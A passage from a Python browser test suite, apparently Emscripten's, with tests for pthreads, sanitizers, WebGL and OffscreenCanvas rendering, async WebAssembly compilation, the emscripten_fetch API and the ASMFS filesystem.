self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
create_test_file('wasm.cpp',
self.with_report_result(
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp')).read()))
self.compile_btest(['wasm.cpp', '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5496), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER=1',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
